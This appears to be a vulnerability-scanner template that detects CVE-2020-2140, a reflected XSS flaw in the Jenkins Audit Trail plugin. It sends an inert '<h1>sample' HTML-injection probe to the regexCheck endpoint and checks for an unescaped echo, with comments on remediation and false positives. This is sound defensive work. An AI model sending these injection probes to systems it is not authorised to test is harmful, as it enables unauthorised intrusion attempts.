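# Detection template for CVE-2020-2140: checks whether the Jenkins Audit Trail
# plugin's regexCheck form-validation endpoint reflects the `value` query
# parameter into its response without HTML-escaping it (reflected XSS).
# The probe carries only an inert <h1> marker. A hit means the marker came back
# unescaped in a response the browser would render as HTML.
# Remediation: update the Audit Trail plugin to a release that contains the fix
# for this CVE (the fixed version is listed in the Jenkins security advisory).
id: CVE-2020-2140
info:
  author: j3ssie/geraldino2
  description: Jenkin rXSS vulnerability
  name: Jenkin Audit XSS
  severity: medium
requests:
  - matchers:
      # The endpoint must answer successfully; error pages that happen to echo
      # the query string are not counted.
      - status:
          - 200
        type: status
      # The marker must appear verbatim. An escaped reflection (&lt;h1&gt;sample)
      # does not match, so a patched endpoint is not reported.
      - part: body
        type: word
        words:
          - <h1>sample
      # Require an HTML content type. A verbatim echo in a text/plain or JSON
      # response is not rendered as markup and would be a false positive.
      - part: header
        type: word
        words:
          - text/html
    # All matchers must hold at once. With the default (or), any 200 response
    # would be flagged.
    matchers-condition: and
    method: GET
    # Two variants of the same probe: Jenkins served at the web root, and
    # Jenkins served under the /jenkins context path.
    path:
      - >-
        {{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample
      - >-
        {{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample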